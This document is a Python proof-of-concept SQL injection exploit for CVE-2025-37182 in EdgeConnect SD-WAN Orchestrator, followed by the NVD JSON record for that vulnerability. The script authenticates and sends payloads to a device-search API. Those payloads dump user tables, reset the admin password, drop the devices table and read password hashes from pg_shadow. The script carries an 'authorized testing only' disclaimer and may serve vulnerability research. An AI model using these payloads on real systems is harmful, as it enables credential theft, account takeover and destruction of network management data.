CVE-2025-37182

# CVE-2025-37182 SQL Injection PoC for EdgeConnect SD-WAN Orchestrator # This PoC demonstrates the SQL injection vulnerability # Note: This is for educational and authorized testing purposes only import requests import sys TARGET_URL = "https://<target-ip>/orchestrator/" LOGIN_ENDPOINT = TARGET_URL + "api/v1/auth/login" INJECT_ENDPOINT = TARGET_URL + "api/v1/devices/search" def login(username, password): """Authenticate with valid credentials""" session = requests.Session() login_data = { "username": username, "password": password } try: response = session.post(LOGIN_ENDPOINT, json=login_data, verify=False, timeout=10) if response.status_code == 200: return session, response.json().get('token') else: print(f"[-] Authentication failed: {response.status_code}") return None, None except Exception as e: print(f"[-] Connection error: {e}") return None, None def exploit_sql_injection(session, token): """Attempt SQL injection attack""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # SQL Injection payload examples payloads = [ "'; SELECT * FROM users; --", "'; UPDATE users SET password='hacked' WHERE username='admin'; --", "'; DROP TABLE devices; --", "' UNION SELECT NULL,username,password FROM pg_shadow--" ] for payload in payloads: inject_data = { "query": payload, "limit": 100 } try: response = session.post(INJECT_ENDPOINT, json=inject_data, headers=headers, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Payload sent: {payload}") print(f"[+] Response: {response.text[:500]}") except Exception as e: print(f"[-] Error with payload {payload}: {e}") def main(): if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <username> <password>") sys.exit(1) username = sys.argv[1] password = sys.argv[2] print(f"[*] Authenticating as {username}...") session, token = login(username, password) if token: print("[+] Authentication successful!") print("[*] Attempting SQL injection...") exploit_sql_injection(session, token) else: print("[-] Exploitation failed - authentication required") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-37182", "sourceIdentifier": "[email protected]", "published": "2026-01-14T17:16:06.030", "lastModified": "2026-01-20T18:17:30.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation."}, {"lang": "es", "value": "Vulnerabilidades en la interfaz de gestión basada en web de EdgeConnect SD-WAN Orchestrator podrían permitir a un atacante remoto autenticado realizar ataques de inyección SQL. La explotación exitosa podría permitir a un atacante ejecutar comandos SQL arbitrarios en la base de datos subyacente, lo que podría llevar a acceso no autorizado a datos o manipulación de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndIncluding": "9.2.10", "matchCriteriaId": "4972AD17-B8C3-4E30-B757-0B5BB830B28C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.0", "versionEndIncluding": "9.3.6", "matchCriteriaId": "48DA7E3C-5E4C-4A91-872E-F278046A3146"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.4.0", "versionEndIncluding": "9.4.4", "matchCriteriaId": "F65E7518-5652-4651-B8B8-25C763044E7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.5.0", "versionEndExcluding": "9.5.6", "matchCriteriaId": "6C96154A-927C-4F4C-B00E-9E10340859A0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:9.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5EBF5C1-4470-40F0-9812-1729E7E42DA0"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}